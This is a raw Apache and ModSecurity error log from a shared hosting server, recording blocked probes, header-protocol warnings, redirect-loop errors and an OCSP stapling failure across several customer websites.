[Mon May 11 20:35:26.237228 2026] [security2:error] [pid 1501883:tid 1501906] [client 216.73.216.110:7933] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIhbjP5Q_-MBliRCAxgqgAAABU"]
[Mon May 11 20:35:27.935471 2026] [security2:error] [pid 1502013:tid 1502048] [client 43.164.131.148:37288] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/nos-realisations/"] [unique_id "agIhb5Yn-x0CHsbEbP2mOwAAAJY"]
[Mon May 11 20:36:10.179072 2026] [core:error] [pid 1502013:tid 1502032] [client 35.81.163.242:37798] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:36:10.185789 2026] [core:error] [pid 1502013:tid 1502032] [client 35.81.163.242:37798] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:36:34.737848 2026] [authz_core:error] [pid 1511173:tid 1511179] [client 47.128.28.198:28388] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/theme-compat/error_log
[Mon May 11 20:36:55.309561 2026] [core:error] [pid 1534836:tid 1534882] [client 66.249.79.131:43816] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:36:55.309710 2026] [core:error] [pid 1534836:tid 1534882] [client 66.249.79.131:43816] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:37:06.355475 2026] [security2:error] [pid 1502013:tid 1502047] [client 170.106.147.63:54812] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agIh0pYn-x0CHsbEbP2m1QAAAJU"]
[Mon May 11 20:37:16.663429 2026] [authz_core:error] [pid 1516058:tid 1516104] [client 34.138.136.88:60034] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php
[Mon May 11 20:37:16.663648 2026] [authz_core:error] [pid 1516058:tid 1516104] [client 34.138.136.88:60034] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php5
[Mon May 11 20:37:16.663690 2026] [authz_core:error] [pid 1516058:tid 1516104] [client 34.138.136.88:60034] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php4
[Mon May 11 20:37:16.663727 2026] [authz_core:error] [pid 1516058:tid 1516104] [client 34.138.136.88:60034] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php3
[Mon May 11 20:37:16.663800 2026] [authz_core:error] [pid 1516058:tid 1516104] [client 34.138.136.88:60034] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.pl
[Mon May 11 20:37:16.663891 2026] [authz_core:error] [pid 1516058:tid 1516104] [client 34.138.136.88:60034] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.cgi
[Mon May 11 20:37:16.663923 2026] [authz_core:error] [pid 1516058:tid 1516104] [client 34.138.136.88:60034] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.jsp
[Mon May 11 20:37:16.663987 2026] [authz_core:error] [pid 1516058:tid 1516104] [client 34.138.136.88:60034] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.phtml
[Mon May 11 20:37:16.664018 2026] [authz_core:error] [pid 1516058:tid 1516104] [client 34.138.136.88:60034] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.shtml
[Mon May 11 20:37:29.223919 2026] [authz_core:error] [pid 1501831:tid 1501847] [client 47.128.125.64:12698] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-supports/error_log
[Mon May 11 20:37:29.289759 2026] [:error] [pid 1511173:tid 1511182] [client 109.86.46.167:50579] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:38:02.880121 2026] [authz_core:error] [pid 1511173:tid 1511181] [client 47.128.125.98:34242] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/error_log
[Mon May 11 20:38:16.954528 2026] [security2:error] [pid 1502013:tid 1502038] [client 101.32.244.128:33756] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/actualites.html"] [unique_id "agIiGJYn-x0CHsbEbP2nIgAAAIs"]
[Mon May 11 20:38:55.471488 2026] [security2:error] [pid 1501883:tid 1501907] [client 43.153.207.127:45134] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agIiPzP5Q_-MBliRCAxhiAAAABY"]
[Mon May 11 20:38:55.451239 2026] [security2:error] [pid 1516058:tid 1516108] [client 43.156.34.42:50864] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/book.php"] [unique_id "agIiPyMeXtzav-mi9SyqIgAAANI"]
[Mon May 11 20:39:34.041891 2026] [security2:error] [pid 1501831:tid 1501853] [client 162.62.132.25:60992] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agIiZlNddpkriGUb6ZVxMAAAARQ"]
[Mon May 11 20:39:38.334471 2026] [security2:error] [pid 1534836:tid 1534873] [client 162.62.132.25:37490] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agIiateaRXe5lR8y0ZONSgAAAUI"], referer: http://www.castiglionecf.com
[Mon May 11 20:39:40.171197 2026] [security2:error] [pid 1502013:tid 1502045] [client 162.62.132.25:39790] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agIibJYn-x0CHsbEbP2n4AAAAJI"], referer: https://www.castiglionecf.com/
[Mon May 11 20:39:51.171554 2026] [security2:error] [pid 1516058:tid 1516093] [client 43.153.58.28:54560] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/calendrier-de-lavent-2019/"] [unique_id "agIidyMeXtzav-mi9SyqsAAAAMM"]
[Mon May 11 20:40:23.846278 2026] [authz_core:error] [pid 1511173:tid 1511176] [client 47.128.58.68:26922] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/search/error_log
[Mon May 11 20:40:25.179784 2026] [security2:error] [pid 1502013:tid 1502049] [client 43.153.215.249:48028] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/simple-ronde/"] [unique_id "agIimZYn-x0CHsbEbP2oEQAAAJc"]
[Mon May 11 20:40:29.399440 2026] [security2:error] [pid 1501883:tid 1501888] [client 43.153.119.119:55636] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/politique-de-confidentialite/embed/"] [unique_id "agIinTP5Q_-MBliRCAxh_gAAAAM"]
[Mon May 11 20:40:54.141883 2026] [security2:error] [pid 1501831:tid 1501851] [client 150.109.119.38:43116] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIitlNddpkriGUb6ZVx6gAAARI"]
[Mon May 11 20:40:57.249664 2026] [:error] [pid 1502013:tid 1502033] [client 114.119.159.233:30793] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=cart&gid=4&systpl=six&language=italian
[Mon May 11 20:41:04.130520 2026] [ssl:error] [pid 1501883:tid 1501902] (EAI 2)Name or service not known: [client 34.243.42.45:33200] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 20:41:04.130849 2026] [ssl:error] [pid 1501883:tid 1501902] AH01941: stapling_renew_response: responder error
[Mon May 11 20:41:45.959446 2026] [authz_core:error] [pid 1534836:tid 1534870] [client 47.128.23.205:24166] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/blocks/error_log
[Mon May 11 20:41:48.474318 2026] [core:error] [pid 1501831:tid 1501842] [client 4.193.137.131:14977] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:48.474455 2026] [core:error] [pid 1501831:tid 1501842] [client 4.193.137.131:14977] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:48.960685 2026] [core:error] [pid 1511173:tid 1511177] [client 4.193.137.131:14632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:48.960718 2026] [core:error] [pid 1511173:tid 1511177] [client 4.193.137.131:14632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:49.446449 2026] [core:error] [pid 1501883:tid 1501892] [client 4.193.137.131:14640] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:49.446488 2026] [core:error] [pid 1501883:tid 1501892] [client 4.193.137.131:14640] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:49.931027 2026] [core:error] [pid 1511173:tid 1511181] [client 4.193.137.131:14643] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:49.931061 2026] [core:error] [pid 1511173:tid 1511181] [client 4.193.137.131:14643] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:50.410371 2026] [core:error] [pid 1501883:tid 1501906] [client 4.193.137.131:14651] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:50.410409 2026] [core:error] [pid 1501883:tid 1501906] [client 4.193.137.131:14651] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:50.922695 2026] [core:error] [pid 1511173:tid 1511196] [client 4.193.137.131:14609] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:50.922735 2026] [core:error] [pid 1511173:tid 1511196] [client 4.193.137.131:14609] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:51.440631 2026] [core:error] [pid 1501831:tid 1501856] [client 4.193.137.131:14647] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:51.440667 2026] [core:error] [pid 1501831:tid 1501856] [client 4.193.137.131:14647] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:51.963759 2026] [core:error] [pid 1534836:tid 1534879] [client 4.193.137.131:14599] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:51.963797 2026] [core:error] [pid 1534836:tid 1534879] [client 4.193.137.131:14599] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:52.443312 2026] [core:error] [pid 1516058:tid 1516103] [client 4.193.137.131:14615] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:52.443342 2026] [core:error] [pid 1516058:tid 1516103] [client 4.193.137.131:14615] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:52.956353 2026] [core:error] [pid 1502013:tid 1502058] [client 4.193.137.131:14638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:52.956383 2026] [core:error] [pid 1502013:tid 1502058] [client 4.193.137.131:14638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:53.479358 2026] [core:error] [pid 1501883:tid 1501886] [client 4.193.137.131:14634] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:53.479394 2026] [core:error] [pid 1501883:tid 1501886] [client 4.193.137.131:14634] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:53.963462 2026] [core:error] [pid 1511173:tid 1511188] [client 4.193.137.131:15015] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:53.963489 2026] [core:error] [pid 1511173:tid 1511188] [client 4.193.137.131:15015] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:54.489250 2026] [core:error] [pid 1516058:tid 1516113] [client 4.193.137.131:14622] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:54.489273 2026] [core:error] [pid 1516058:tid 1516113] [client 4.193.137.131:14622] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:54.967277 2026] [core:error] [pid 1511173:tid 1511200] [client 4.193.137.131:14606] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:54.967313 2026] [core:error] [pid 1511173:tid 1511200] [client 4.193.137.131:14606] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:57.043051 2026] [core:error] [pid 1501831:tid 1501835] [client 4.193.137.131:14642] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:57.043086 2026] [core:error] [pid 1501831:tid 1501835] [client 4.193.137.131:14642] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:57.842204 2026] [core:error] [pid 1501831:tid 1501841] [client 4.193.137.131:14862] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:57.842242 2026] [core:error] [pid 1501831:tid 1501841] [client 4.193.137.131:14862] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:58.371362 2026] [core:error] [pid 1501831:tid 1501833] [client 4.193.137.131:14888] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:58.371398 2026] [core:error] [pid 1501831:tid 1501833] [client 4.193.137.131:14888] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:58.874517 2026] [core:error] [pid 1534836:tid 1534877] [client 4.193.137.131:14910] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:58.874556 2026] [core:error] [pid 1534836:tid 1534877] [client 4.193.137.131:14910] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:59.432363 2026] [core:error] [pid 1534836:tid 1534875] [client 4.193.137.131:14594] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:59.432411 2026] [core:error] [pid 1534836:tid 1534875] [client 4.193.137.131:14594] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:59.921064 2026] [core:error] [pid 1516058:tid 1516102] [client 4.193.137.131:14860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:41:59.921097 2026] [core:error] [pid 1516058:tid 1516102] [client 4.193.137.131:14860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:00.423608 2026] [core:error] [pid 1511173:tid 1511185] [client 4.193.137.131:14857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:00.423643 2026] [core:error] [pid 1511173:tid 1511185] [client 4.193.137.131:14857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:00.926566 2026] [core:error] [pid 1501883:tid 1501900] [client 4.193.137.131:14871] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:00.926597 2026] [core:error] [pid 1501883:tid 1501900] [client 4.193.137.131:14871] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:01.428718 2026] [core:error] [pid 1516058:tid 1516108] [client 4.193.137.131:14618] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:01.428753 2026] [core:error] [pid 1516058:tid 1516108] [client 4.193.137.131:14618] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:01.932272 2026] [core:error] [pid 1534836:tid 1534881] [client 4.193.137.131:14859] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:01.932306 2026] [core:error] [pid 1534836:tid 1534881] [client 4.193.137.131:14859] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:02.414724 2026] [core:error] [pid 1501831:tid 1501853] [client 4.193.137.131:14880] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:02.414754 2026] [core:error] [pid 1501831:tid 1501853] [client 4.193.137.131:14880] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:02.920237 2026] [core:error] [pid 1511173:tid 1511196] [client 4.193.137.131:14901] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:02.920268 2026] [core:error] [pid 1511173:tid 1511196] [client 4.193.137.131:14901] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:03.451039 2026] [core:error] [pid 1501831:tid 1501856] [client 4.193.137.131:14848] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
